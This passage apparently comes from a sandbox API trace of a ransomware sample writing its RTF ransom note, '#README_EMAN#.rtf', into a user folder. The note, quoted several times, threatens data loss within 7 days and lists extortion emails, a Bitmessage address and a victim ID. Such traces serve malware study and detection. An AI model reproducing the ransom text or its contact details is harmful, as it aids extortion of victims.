:\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0300.417] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x248a258, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7f\x13\n", lpUsedDefaultChar=0x0) returned 8717 [0300.417] WriteFile (in: hFile=0x2d4, lpBuffer=0x248a258*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x248a258*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0300.418] CloseHandle (hObject=0x2d4) returned 1 [0300.418] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Vault\\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\vault\\4bf4c442-9b8a-41a0-b380-dd4a704ddb28\\#readme_eman#.rtf")) returned 0xffffffff [0300.418] GetLastError () returned 0x2 [0300.418] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Vault\\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\vault\\4bf4c442-9b8a-41a0-b380-dd4a704ddb28\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d4 [0300.440] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal 